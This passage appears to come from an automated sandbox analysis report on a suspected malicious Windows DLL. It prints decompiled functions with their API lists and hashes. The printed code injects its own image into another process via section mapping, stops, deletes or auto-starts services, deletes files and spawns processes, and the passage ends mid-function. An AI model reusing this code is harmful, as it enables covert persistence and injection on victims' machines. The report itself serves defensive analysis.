                                                                                                                        • CloseHandle.KERNEL32(00000020,?,?,?,00000010,?,00000044,00000000), ref: 6F3336D7
                                                                                                                        • DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6F3336E4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6F3336EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleMemory$BlockCreateEnvironmentSleepZero$DestroyEnumerateFreeProcessSessionsUser
                                                                                                                        • String ID: $D
                                                                                                                        • API String ID: 826248435-1196817373
                                                                                                                        • Opcode ID: 2f2956be3448f8421239fff0721c35f5c2ad7631132987e81a7fe7c3b17f3ee8
                                                                                                                        • Instruction ID: 7d98abb27de6b560100ab5b648fe3f8b3eeb76671e6fb0a2d26e1fc012b2fd68
                                                                                                                        • Opcode Fuzzy Hash: 2f2956be3448f8421239fff0721c35f5c2ad7631132987e81a7fe7c3b17f3ee8
                                                                                                                        • Instruction Fuzzy Hash: 762171B2A043A5AFE610DB64CC81F6B77ECEB85754F00490DF690A7280D774E8098BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332DF0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E6F332DF0(intOrPtr _a4, intOrPtr _a8) {
				char _v512;
				char _v520;
				char _v832;
				struct _WIN32_FIND_DATAA _v840;
				signed char _t19;
				CHAR* _t26;
				intOrPtr _t29;
				void* _t36;
				void* _t37;
				FILETIME* _t40;

				_t29 = _a4;
				_t37 = 0;
				wsprintfA( &_v520, "%s%c%s", _t29, 0x2a, _a8);
				_t40 =  &( &_v840->ftLastWriteTime);
				_push(0x140);
				_push( &_v832);
				L6F33C2EE();
				_t36 = FindFirstFileA( &_v520,  &_v840);
				if(_t36 != 0xffffffff) {
					do {
						_t19 = _v840.dwFileAttributes;
						if((_t19 & 0x00000010) == 0 && _t19 != 0) {
							wsprintfA( &_v520, "%s%s", _t29,  &(_v840.cFileName));
							_t40 = _t40 + 0x10;
							_t26 = DeleteFileA( &_v512);
							if(_t26 == 0) {
								MoveFileExA( &_v512, _t26, 4);
							}
							_t37 = 1;
						}
					} while (FindNextFileA(_t36,  &_v840) != 0);
					FindClose(_t36);
					return _t37;
				} else {
					return 0;
				}
			}













                                                                                                                        0x6f332dfb
                                                                                                                        0x6f332e1c
                                                                                                                        0x6f332e1e
                                                                                                                        0x6f332e20
                                                                                                                        0x6f332e23
                                                                                                                        0x6f332e2c
                                                                                                                        0x6f332e2d
                                                                                                                        0x6f332e45
                                                                                                                        0x6f332e4a
                                                                                                                        0x6f332e60
                                                                                                                        0x6f332e60
                                                                                                                        0x6f332e66
                                                                                                                        0x6f332e7f
                                                                                                                        0x6f332e81
                                                                                                                        0x6f332e8c
                                                                                                                        0x6f332e94
                                                                                                                        0x6f332ea1
                                                                                                                        0x6f332ea1
                                                                                                                        0x6f332ea7
                                                                                                                        0x6f332ea7
                                                                                                                        0x6f332eb8
                                                                                                                        0x6f332ebd
                                                                                                                        0x6f332ecf
                                                                                                                        0x6f332e4f
                                                                                                                        0x6f332e58
                                                                                                                        0x6f332e58

                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 6F332E1E
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000140), ref: 6F332E2D
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,00000140), ref: 6F332E3F
                                                                                                                        • wsprintfA.USER32 ref: 6F332E7F
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 6F332E8C
                                                                                                                        • MoveFileExA.KERNEL32 ref: 6F332EA1
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 6F332EB2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 6F332EBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$wsprintf$CloseDeleteFirstMemoryMoveNextZero
                                                                                                                        • String ID: %s%c%s$%s%s
                                                                                                                        • API String ID: 3499340181-3555087778
                                                                                                                        • Opcode ID: 1e441bb8b4b3cb56a1f0265f5d2aff9d2d82852ddff8eecaa43896e3dead2926
                                                                                                                        • Instruction ID: f4bc618684fe5d52835a5a6c54ff989a0e3287ad4fc953531d052855620c27db
                                                                                                                        • Opcode Fuzzy Hash: 1e441bb8b4b3cb56a1f0265f5d2aff9d2d82852ddff8eecaa43896e3dead2926
                                                                                                                        • Instruction Fuzzy Hash: 7321D573A04395ABD320DBA4DC85EEB73ADEBC8721F40091DFA54D6140EB35E11487A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334EF0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81processnativesynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 73%
                                                                                                                        			E6F334EF0(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				DWORD* _v0;
				signed int _v4;
				signed int _v8;
				CHAR* _v12;
				struct _STARTUPINFOA _v84;
				char _v92;
				void* _v96;
				void* _v100;
				signed int _t17;
				signed int _t23;
				long _t27;
				DWORD* _t30;
				intOrPtr _t33;
				struct _PROCESS_INFORMATION* _t44;

				_t44 =  &_v84;
				_push(0x44);
				_push( &(_v84.dwX));
				L6F33C2EE();
				_push(0x10);
				_push( &_v92);
				L6F33C2EE();
				_t17 = _v8;
				_v84.cb = 0x44;
				if(_t17 == 0) {
					_v84.dwFlags = 1;
				}
				_t33 = _a12;
				if(_t33 != 0) {
					_v84.lpDesktop = _t33;
				}
				asm("sbb eax, eax");
				if(CreateProcessA(0, _v12, 0, 0, 0,  ~_t17 & 0x08000000, 0, _a8,  &_v84, _t44) == 0) {
					return 0;
				} else {
					_t23 = _v4;
					if(_t23 != 0) {
						if(_t23 == 0xffffffff) {
							_t27 = _t23 | 0xffffffff;
						} else {
							_t27 = _t23 * 0x3e8;
						}
						if(WaitForSingleObject(_v100, _t27) != 0) {
							if(_a4 != 0) {
								_push(0);
								_push(_v100);
								L6F33C30C();
							}
						} else {
							_t30 = _v0;
							if(_t30 != 0) {
								GetExitCodeProcess(_v100, _t30);
							}
						}
					}
					CloseHandle(_v96);
					CloseHandle(_v100);
					return 1;
				}
			}

















                                                                                                                        0x6f334ef0
                                                                                                                        0x6f334ef3
                                                                                                                        0x6f334ef9
                                                                                                                        0x6f334efa
                                                                                                                        0x6f334eff
                                                                                                                        0x6f334f05
                                                                                                                        0x6f334f06
                                                                                                                        0x6f334f0b
                                                                                                                        0x6f334f0f
                                                                                                                        0x6f334f19
                                                                                                                        0x6f334f1b
                                                                                                                        0x6f334f1b
                                                                                                                        0x6f334f23
                                                                                                                        0x6f334f29
                                                                                                                        0x6f334f2b
                                                                                                                        0x6f334f2b
                                                                                                                        0x6f334f41
                                                                                                                        0x6f334f5e
                                                                                                                        0x6f334fd2
                                                                                                                        0x6f334f60
                                                                                                                        0x6f334f60
                                                                                                                        0x6f334f66
                                                                                                                        0x6f334f6b
                                                                                                                        0x6f334f75
                                                                                                                        0x6f334f6d
                                                                                                                        0x6f334f6d
                                                                                                                        0x6f334f6d
                                                                                                                        0x6f334f85
                                                                                                                        0x6f334fa1
                                                                                                                        0x6f334fa6
                                                                                                                        0x6f334fa8
                                                                                                                        0x6f334fa9
                                                                                                                        0x6f334fa9
                                                                                                                        0x6f334f87
                                                                                                                        0x6f334f87
                                                                                                                        0x6f334f8d
                                                                                                                        0x6f334f94
                                                                                                                        0x6f334f94
                                                                                                                        0x6f334f8d
                                                                                                                        0x6f334f85
                                                                                                                        0x6f334fba
                                                                                                                        0x6f334fc1
                                                                                                                        0x6f334fcc
                                                                                                                        0x6f334fcc

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F334EFA
                                                                                                                        • RtlZeroMemory.NTDLL(00000044,00000010), ref: 6F334F06
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,?), ref: 6F334F56
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6F334F7D
                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 6F334F94
                                                                                                                        • NtTerminateProcess.NTDLL(00000000,00000000), ref: 6F334FA9
                                                                                                                        • CloseHandle.KERNEL32(00000044), ref: 6F334FBA
                                                                                                                        • CloseHandle.KERNEL32(00000044), ref: 6F334FC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseHandleMemoryZero$CodeCreateExitObjectSingleTerminateWait
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 2123967418-2746444292
                                                                                                                        • Opcode ID: 1c6ec34be75abdd9849f1e6a5a3d158d07c0fbc19b670bdfa033a27e5f27ee90
                                                                                                                        • Instruction ID: 1f66655607f68f2d6858a68d12e090dfd645e0519f7c0ebd8c6f870ef632578d
                                                                                                                        • Opcode Fuzzy Hash: 1c6ec34be75abdd9849f1e6a5a3d158d07c0fbc19b670bdfa033a27e5f27ee90
                                                                                                                        • Instruction Fuzzy Hash: B9214F72A583916BE714DB64CD40F5B73EDBF84B14F144A1DB5A0C62D0D77AE804CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333700, Relevance: 15.1, APIs: 10, Instructions: 76servicesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F333700(char* _a4, intOrPtr _a8) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _v32;
				char* _t12;
				void* _t24;
				void* _t28;
				void* _t31;
				int _t32;

				_t32 = 0;
				_v32 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_t24 = _t12;
				if(_t24 != 0) {
					L2:
					_t28 = OpenServiceA(_t24, _a4, 0xf01ff);
					if(_t28 == 0) {
						L13:
						CloseServiceHandle(_t24);
						L14:
						return _t32;
					}
					QueryServiceStatus(_t28,  &_v28);
					if(_v24 == 1) {
						L9:
						if(_a8 != 0) {
							_v32 = DeleteService(_t28);
						} else {
							_v32 = 1;
						}
						L12:
						CloseServiceHandle(_t28);
						_t32 = _v32;
						goto L13;
					}
					if(ControlService(_t28, 1,  &_v28) == 0) {
						goto L12;
					}
					_t31 = 0;
					while(1) {
						QueryServiceStatus(_t28,  &_v28);
						if(_v24 == 1) {
							goto L9;
						}
						Sleep(0x3e8);
						_t31 = _t31 + 1;
						if(_t31 < 0x3c) {
							continue;
						}
						goto L12;
					}
					goto L9;
				}
				_t24 = OpenSCManagerA(_t12, _t12, 1);
				if(_t24 == 0) {
					goto L14;
				}
				goto L2;
			}











                                                                                                                        0x6f33370c
                                                                                                                        0x6f333715
                                                                                                                        0x6f333719
                                                                                                                        0x6f33371b
                                                                                                                        0x6f33371f
                                                                                                                        0x6f333731
                                                                                                                        0x6f333743
                                                                                                                        0x6f333747
                                                                                                                        0x6f3337bf
                                                                                                                        0x6f3337c0
                                                                                                                        0x6f3337c8
                                                                                                                        0x6f3337cf
                                                                                                                        0x6f3337cf
                                                                                                                        0x6f33374f
                                                                                                                        0x6f33375a
                                                                                                                        0x6f333798
                                                                                                                        0x6f33379d
                                                                                                                        0x6f3337b0
                                                                                                                        0x6f33379f
                                                                                                                        0x6f33379f
                                                                                                                        0x6f33379f
                                                                                                                        0x6f3337b4
                                                                                                                        0x6f3337b5
                                                                                                                        0x6f3337bb
                                                                                                                        0x00000000
                                                                                                                        0x6f3337bb
                                                                                                                        0x6f33376c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333774
                                                                                                                        0x6f333776
                                                                                                                        0x6f33377c
                                                                                                                        0x6f333787
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33378e
                                                                                                                        0x6f333790
                                                                                                                        0x6f333794
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333796
                                                                                                                        0x00000000
                                                                                                                        0x6f333776
                                                                                                                        0x6f333727
                                                                                                                        0x6f33372b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333719
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333725
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 6F33373D
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33374F
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 6F333764
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33377C
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F33378E
                                                                                                                        • DeleteService.ADVAPI32(00000000), ref: 6F3337AA
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337B5
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337C0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$Open$CloseHandleManagerQueryStatus$ControlDeleteSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3264530519-0
                                                                                                                        • Opcode ID: d1ddb42e66a8eb90f4376716a6b95f4a27417c971984c5e5bba463e16b09566a
                                                                                                                        • Instruction ID: 5263d4b2a8fcea566895c1d9edce346c899a6bba8f128117c562c56ae9b7ae69
                                                                                                                        • Opcode Fuzzy Hash: d1ddb42e66a8eb90f4376716a6b95f4a27417c971984c5e5bba463e16b09566a
                                                                                                                        • Instruction Fuzzy Hash: F32105B3904799ABD710DF648CC9A7F77FDEB8AB11F00051DF94086100DBB1E8498762
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3337D0, Relevance: 13.6, APIs: 9, Instructions: 80memoryserviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F3337D0(int _a4, char** _a8, int _a12) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _t14;
				long _t18;
				int _t26;
				void* _t31;
				void* _t33;

				_t31 = _a4;
				if(_t31 == 0) {
					return 0;
				} else {
					_a4 = 0;
					if(QueryServiceConfigA(_t31, 0, 0,  &_a4) != 0) {
						_t18 = _a4;
						_t26 = _t18;
						_t33 = HeapAlloc(GetProcessHeap(), 8, _t18);
						if(_t33 != 0) {
							if(QueryServiceConfigA(_t31, _t33, _t26,  &_a4) != 0 &&  *((intOrPtr*)(_t33 + 4)) != 2) {
								ChangeServiceConfigA(_t31, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
							}
							HeapFree(GetProcessHeap(), 0, _t33);
						}
					}
					_t14 = QueryServiceStatus(_t31,  &_v28);
					if(_v24 != 4 || _t14 == 0) {
						StartServiceA(_t31, _a12, _a8);
					}
					return 1;
				}
			}










                                                                                                                        0x6f3337d4
                                                                                                                        0x6f3337da
                                                                                                                        0x6f333897
                                                                                                                        0x6f3337e0
                                                                                                                        0x6f3337f1
                                                                                                                        0x6f3337fd
                                                                                                                        0x6f3337ff
                                                                                                                        0x6f333808
                                                                                                                        0x6f333817
                                                                                                                        0x6f33381b
                                                                                                                        0x6f333829
                                                                                                                        0x6f333846
                                                                                                                        0x6f333846
                                                                                                                        0x6f333856
                                                                                                                        0x6f333856
                                                                                                                        0x6f33385d
                                                                                                                        0x6f333864
                                                                                                                        0x6f333870
                                                                                                                        0x6f333881
                                                                                                                        0x6f333881
                                                                                                                        0x6f333890
                                                                                                                        0x6f333890

                                                                                                                        APIs
                                                                                                                        • QueryServiceConfigA.ADVAPI32 ref: 6F3337F9
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000), ref: 6F33380A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333811
                                                                                                                        • QueryServiceConfigA.ADVAPI32(?,00000000,?,?), ref: 6F333825
                                                                                                                        • ChangeServiceConfigA.ADVAPI32(?,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F333846
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33384F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333856
                                                                                                                        • QueryServiceStatus.ADVAPI32(?,?), ref: 6F333864
                                                                                                                        • StartServiceA.ADVAPI32(?,?,?), ref: 6F333881
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$Heap$ConfigQuery$Process$AllocChangeFreeStartStatus
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1115209516-0
                                                                                                                        • Opcode ID: 316321dbec79f1ad0a06c4a981634d515364f495dcd244e94ef274cd30321a77
                                                                                                                        • Instruction ID: 6b9c217e72629dd9ae21a3bc7e989c57eb31603a4ef8cae699d9587f01e7282d
                                                                                                                        • Opcode Fuzzy Hash: 316321dbec79f1ad0a06c4a981634d515364f495dcd244e94ef274cd30321a77
                                                                                                                        • Instruction Fuzzy Hash: 3511DF32604754BBE620DA648C4AFBB7BBDEF85B70F40861DF519DA180D732E8158B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332640, Relevance: 12.1, APIs: 8, Instructions: 98nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E6F332640() {
				char _v8;
				void* _v16;
				long _v24;
				void* _v32;
				long _v44;
				void* _v48;
				void* _v56;
				void* _v64;
				long _v80;
				void* _v88;
				void* _v92;
				void* _v120;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _t45;
				void* _t58;
				intOrPtr _t59;

				_t58 = "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD";
				_t1 = _t58 + 0x3c; // 0xf8
				_t59 =  *_t1;
				_t45 = 0;
				if( *((intOrPtr*)(_t59 + _t58)) == 0x4550) {
					_push(8);
					_push( &_v8);
					_v24 = 0;
					L6F33C2EE();
					_v16 =  *(_t59 + _t58 + 0x50);
					if(NtCreateSection( &_v32, 0xe, 0,  &_v16, 0x40, 0x8000000, 0) >= 0) {
						_v48 = 0;
						_v44 = 0;
						if(NtMapViewOfSection(_v56, 0xffffffff,  &_v48, 0, 0, 0,  &_v44, 2, 0, 0x40) >= 0) {
							_v88 = 0;
							if(NtMapViewOfSection(_v92, _v64,  &_v88, 0, 0, 0,  &_v80, 2, 0, 0x40) >= 0) {
								RtlMoveMemory(_v120, _t58,  *(_t59 + _t58 + 0x50));
								if(E6F3325B0(_v132, _v136) == 0) {
									NtUnmapViewOfSection(_v140, _v136);
								} else {
									_t45 = _v136;
								}
							}
							NtUnmapViewOfSection(0xffffffff, _v120);
						}
						NtClose(_v92);
					}
				}
				return _t45;
			}





















                                                                                                                        0x6f332646
                                                                                                                        0x6f33264c
                                                                                                                        0x6f33264c
                                                                                                                        0x6f33264f
                                                                                                                        0x6f332658
                                                                                                                        0x6f33265e
                                                                                                                        0x6f332664
                                                                                                                        0x6f332665
                                                                                                                        0x6f332669
                                                                                                                        0x6f332687
                                                                                                                        0x6f332692
                                                                                                                        0x6f3326b1
                                                                                                                        0x6f3326b5
                                                                                                                        0x6f3326c0
                                                                                                                        0x6f3326de
                                                                                                                        0x6f3326e9
                                                                                                                        0x6f3326f6
                                                                                                                        0x6f33270f
                                                                                                                        0x6f332721
                                                                                                                        0x6f332711
                                                                                                                        0x6f332711
                                                                                                                        0x6f332711
                                                                                                                        0x6f33270f
                                                                                                                        0x6f33272d
                                                                                                                        0x6f33272d
                                                                                                                        0x6f332737
                                                                                                                        0x6f332737
                                                                                                                        0x6f332692
                                                                                                                        0x6f332744

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000008), ref: 6F332669
                                                                                                                        • NtCreateSection.NTDLL ref: 6F33268B
                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326B9
                                                                                                                        • NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6F3326E2
                                                                                                                        • RtlMoveMemory.NTDLL(?,6F330000,?), ref: 6F3326F6
                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 6F332721
                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6F33272D
                                                                                                                        • NtClose.NTDLL(?), ref: 6F332737
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Section$View$MemoryUnmap$CloseCreateMoveZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1304417992-0
                                                                                                                        • Opcode ID: 24aa4d2842e9f3f6c4d282406a3453828eb1ea6e8f1eba35bf3f88bb66c009d4
                                                                                                                        • Instruction ID: 354695f8e0d8794e2a2a7c850580af7fd883c47243ce42f0c314c4392ee4c867
                                                                                                                        • Opcode Fuzzy Hash: 24aa4d2842e9f3f6c4d282406a3453828eb1ea6e8f1eba35bf3f88bb66c009d4
                                                                                                                        • Instruction Fuzzy Hash: 6B3100B6608351BFE210DA94CDC0E6BB7ECFBC8658F404A1DF69596281D774ED048BB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F337790, Relevance: 12.1, APIs: 8, Instructions: 86threadwindownativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F337790(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _t7;
				void* _t8;
				_Unknown_base(*)()* _t10;
				long _t14;
				void* _t17;
				int _t20;
				void* _t22;
				void* _t24;
				struct HWND__* _t25;
				int _t26;
				void* _t27;

				_t20 = _a12;
				_t26 = _a8;
				_t25 = _a4;
				_t27 = _t26 - 0x16;
				if(_t27 > 0) {
					if(_t26 == 0x18) {
						goto L15;
					} else {
						if(_t26 == 0x112) {
							_t7 = _t20 - 0xf020;
							if(_t7 == 0) {
								goto L15;
							} else {
								_t8 = _t7 - 0x10;
								if(_t8 == 0 || _t8 == 0xf0) {
									goto L15;
								} else {
									goto L19;
								}
							}
						} else {
							if(_t26 != 0x83fc) {
								goto L19;
							} else {
								"one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t20;
								M6F3404C0 = CreateThread(0, 0, E6F336D50, 0, 0,  &M6F3404C4);
								goto L15;
							}
						}
					}
				} else {
					if(_t27 == 0) {
						PostMessageA(_t25, 0x10, 0, 0);
						goto L19;
					} else {
						if(_t26 == 3 || _t26 == 7) {
							L15:
							return 0;
						} else {
							if(_t26 == 0x10) {
								M6F3404B0 = 1;
								if(M6F3404C0 != 0) {
									_t14 = M6F3404C4; // 0x0
									PostThreadMessageA(_t14, _t26, 0, 0);
									_t22 = M6F3404C0; // 0x0
									if(WaitForSingleObject(_t22, 0x1388) != 0) {
										_t24 = M6F3404C0; // 0x0
										NtTerminateThread(_t24, 0);
									}
									_t17 = M6F3404C0; // 0x0
									CloseHandle(_t17);
								}
								PostQuitMessage(0);
							}
							L19:
							_t10 = "one=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
